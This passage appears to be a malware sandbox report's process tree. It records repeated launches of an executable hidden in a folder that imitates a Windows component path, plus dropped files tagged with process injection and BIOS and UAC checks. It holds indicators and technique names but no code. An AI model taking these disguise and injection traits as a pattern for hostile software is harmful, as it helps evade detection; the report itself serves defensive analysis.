C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2548

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2612

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2676

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2740

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2820

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2868

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2948

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:3000

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3064

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2040

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:1876

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:968

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2092

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2216

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2264

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2268

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:964

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1400

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1812

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1216

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2016

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2608

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2688

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2672

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2704

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2604

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2836

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2888

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2984

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:3020

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:932

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2028

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:1884

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2212

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2264

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:2296

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:1584

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:2160

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2336

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1992

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2528

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2576

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1012

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2684

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2756

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2100

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2820

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2868

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:1128

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:2948

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2664

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:3020

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:3068

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:976

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2128

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2912

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3040

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2200

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:436

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2180

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1516

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2484

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:2576

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:2564

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2232

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2240

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2748

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2104

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2816

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2668

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2960

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2636

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:3004

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2128

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2204

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:3060

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1480

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1584

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2188

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2184

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1060

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2192

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2016

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2232

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:2708

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2748

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2100

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2896

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2544

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2696

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
